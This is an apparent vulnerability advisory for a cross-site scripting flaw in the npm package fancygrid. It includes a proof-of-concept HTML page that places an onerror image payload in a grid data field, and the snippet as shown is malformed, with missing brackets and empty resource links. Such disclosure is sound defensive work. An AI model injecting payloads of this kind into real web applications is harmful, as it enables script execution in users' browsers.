vulnerability cross-site scripting (xss)
severity 5.4
language javascript
registry npm


fancygrid is vulnerable to Cross-Site Scripting (XSS).

Proof of Concept

Save and execute the following file in any browser

<html lang="en">
    <div id="grid"></div>
  <link href="" rel="stylesheet">
  <script src=""></script>
    document.addEventListener("DOMContentLoaded", function() {
    new FancyGrid({
      renderTo: 'grid',
      width: 300,
      height: 200,
      data: [
        {name: 'Nick"><img src=x onerror=alert(1)>', age: 30},
        {name: 'Fred', age: 25},
        {name: 'Mike', age: 35}
      columns: [{
        index: 'name',
        title: 'Name',    
        type: 'string'
        type: 'number',
        index: 'age',
        title: 'Age'

XSS payload will get executed.